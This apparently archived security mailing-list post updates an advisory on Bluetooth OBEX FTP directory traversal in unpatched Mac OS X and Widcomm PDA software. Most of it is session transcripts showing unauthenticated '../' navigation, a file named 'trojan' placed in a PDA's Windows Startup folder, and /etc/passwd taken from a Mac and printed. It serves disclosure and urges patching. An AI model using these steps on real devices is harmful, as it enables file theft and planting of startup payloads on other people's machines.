<<< Date Index >>>     <<< Thread Index >>>

Bluetooth dot dot attacks (update)




in DMA[2005-0502a] I stated that "...I can not confirm nor deny that files can 
be placed or retrieved via OBEX FTP and 
the ../../ method. I have only been able to list files using my current obex 
client (Against Mac OSX). 

With a modified version of btftp from Affix-3.2.0 I am now able to confirm that 
an attacker also has the ability to both 
grab and put files outside of the default drop path when using OBEX ftp. 

Zero authentication is required on OSX if an unpatched machine is being used. 

I can also now state that Widcomm software on PDA's are also affected. This is 
NOT the same as my object push ../ 
vulnerability. This Widcomm bug is yet another bug that has not been disclosed 
in the past. Some PDA's require 
authentication for OBEX ftp ... some do not. 

Here is an example attack against my HP Ipaq 2215 

animosity:/usr/src/affix-3.2.0# btftp
Affix version: Affix 3.2.0
Welcome to btftp (OBEX) tool. Type ? for help.
Mode: Bluetooth
ftp> open 00:04:3e:65:a1:c8
Service found on channel: 3
Connected.
ftp> ls
-rwdx           634             eyiot447.pwi
drwdx           0               Business
drwdx           0               Personal
drwdx           0               Templates
Command complete.
ftp> cd ../
Command complete.
ftp> ls
drwdx           0               ..
Command complete.
ftp> cd Windows
Command complete.
ftp> cd Startup
Command complete.
ftp> put /etc/hosts trojan
Transfer started...
Transfer complete.
257 bytes sent in 0.5 secs (5140.00 B/s)
ftp> ls trojan
Browsing error: OBEX error: Internal server error (0x50)
ftp>                                                   

If I go to the iPaq and browse the folder in question the file is sitting right 
where I placed it. 

Here is an example attack against my Apple OSX machine this shows me grabbing 
/etc/passwd

animosity:/usr/src/affix-3.2.0# btftp
Affix version: Affix 3.2.0
Welcome to btftp (OBEX) tool. Type ? for help.
Mode: Bluetooth
ftp> open 00:11:95:4f:60:1f
Service found on channel: 15
Connected.
ftp> ls
d----           0               Faxes
d----           0               New Folder
d----           0               SC Info
Command complete.
ftp> cd ../
Command complete.
ftp> ls
d----           0               ..
-----           195662          4D WebSTAR Installer.log
d----           0               johnh
d----           0               kevinfinisterre
d----           0               Shared
d----           0               webstar
Command complete.
ftp> cd ../
Command complete.
ftp> ls
d----           0               ..
d----           0               Applications
d----           0               automount
d----           0               bin
d----           0               cores
-----           3584            Desktop DB
-----           4482            Desktop DF
d----           0               dev
d----           0               Developer
-----           11              etc
d----           0               File Transfer Folder
d----           0               Library
-----           9               mach
-----           571184          mach.sym
-----           3872560         mach_kernel
d----           0               Network
d----           0               private
d----           0               sbin
d----           0               System
-----           11              tmp
d----           0               Users
d----           0               usr
-----           11              var
d----           0               Volumes
Command complete.
ftp> cd etc
Command complete.
ftp> ls
d----           0               ..
-----           753             6to4.conf
-----           515             afpovertcp.cfg
-----           15              aliases
-----           16384           aliases.db
-----           1046            amd.conf.template
-----           112             amd.map.template
d----           0               auth
-----           14761           authorization
-----           16541           authorization.cac
-----           160             bashrc
d----           0               charset
-----           295             crontab
-----           189             csh.cshrc
-----           83              csh.login
-----           39              csh.logout
d----           0               cups
-----           24              daily
d----           0               defaults
-----           0               dumpdates
-----           695             efax.rc
-----           0               find.codes
d----           0               fonts
-----           293             fstab
-----           150             fstab.hd
-----           119             ftpusers
-----           576             gdb.conf
-----           5678            gettytab
-----           699             group
-----           491             hostconfig
-----           492             hostconfig~
-----           0               hosts.equiv
-----           0               hosts.lpd
d----           0               httpd
d----           0               idmap
-----           2893            inetd.conf
-----           12              kcpassword
-----           0               kern_loader.conf
-----           30              localtime
-----           131072          lowcase.dat
d----           0               mach_init.d
d----           0               mach_init_per_user.d
-----           105             mail.rc
-----           891             manpath.config
-----           1259            master.passwd
-----           88039           moduli
-----           28              monthly
-----           19              motd
-----           905             named.conf
-----           53              networks
-----           132             notify.conf
-----           44              ntp.conf
d----           0               openldap
d----           0               pam.d
-----           1374            passwd
d----           0               pdb
d----           0               periodic
-----           38693           php.ini.default
d----           0               postfix
d----           0               ppp
-----           125             profile
-----           5766            protocols
d----           0               racoon
-----           8099            rc
-----           3572            rc.boot
-----           4178            rc.cleanup
-----           2356            rc.common
-----           4763            rc.netboot
-----           20              resolv.conf
d----           0               resolver
-----           13              rmt
-----           0               rmtab
-----           971             rpc
-----           983             rtadvd.conf
-----           572576          services
-----           170             shells
-----           52              slpsa.conf
-----           1732            smb.conf
-----           1144            ssh_config
-----           668             ssh_host_dsa_key
-----           590             ssh_host_dsa_key.pub
-----           515             ssh_host_key
-----           319             ssh_host_key.pub
-----           883             ssh_host_rsa_key
-----           210             ssh_host_rsa_key.pub
-----           2409            sshd_config
-----           361             sudoers
-----           798             syslog.conf
-----           2442            ttys
-----           131072          upcase.dat
-----           65536           valid.dat
d----           0               vfs
-----           26              weekly
-----           238             xinetd.conf
d----           0               xinetd.d
-----           0               xtab
Command complete.
ftp> get passwd
Transfer started...
Transfer complete.
268564544 bytes received in 0.34 secs (789895717.65 B/s)

animosity:/usr/local/bin# cat passwd
##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode.  At other times this information is handled by one or more of:
# lookupd DirectoryServices
# By default, lookupd gets information from NetInfo, so this file will
# not be consulted unless you have changed lookupd's configuration.
# This file is used while in single user mode.
#
# To use this file for normal authentication, you may enable it with
# /Applications/Utilities/Directory Access.
##
nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/false
lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false
postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin/false
www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false
cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false
mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false
appserver:*:79:79:Application Server:/var/empty:/usr/bin/false
unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

This shows me placing a file in /tmp

Affix version: Affix 2.1.1
Wellcome to OBEX ftp. Type ? for help.
Mode: Bluetooth
SDP: yes
ftp> open 00:11:95:4f:60:1f
Connected.
ftp> ls
d----           0               Faxes
d----           0               New Folder
d----           0               SC Info
Command complete.
ftp> cd ../
Command complete.
ftp> cd ../
Command complete.
ftp> cd tmp
Command complete.
ftp> ls
d----           0               ..
Command complete.
ftp> put /etc/hosts hosts
Transfer started...
Transfer complete.
257 bytes sent in 0.10 secs (2570.00 B/s)
ftp> ls
d----           0               ..
d----           0               501
-----           257             hosts
Command complete.

Keep in mind that you are using the permissions of the currently logged in user 
so you may not have access to 
everything. 

It seems pretty trivial to turn these issues into a worm or some other form of 
automated attack. 

Please apply your Apple updates and turn off that Widcomm stuff if you aren't 
using it! Do NOT accept requests 
from unknown bluetooth sources. 

enjoy.
-KF